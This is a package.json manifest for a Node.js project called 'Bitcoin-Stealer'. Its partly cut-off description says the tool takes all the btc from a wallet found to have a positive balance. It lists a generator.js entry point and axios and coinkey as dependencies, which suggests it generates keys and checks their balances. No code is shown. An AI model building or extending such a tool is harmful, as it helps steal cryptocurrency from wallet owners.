{
  "name": "Bitcoin-Stealer",
  "version": "1.0.0",
  "description": " has a positive balance, and then take all the btc from it.",
  "main": "generator.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "new123",
  "license": "ISC",
  "dependencies": {
    "axios": "^1.6.2",
    "coinkey": "^3.0.0"
  }
}
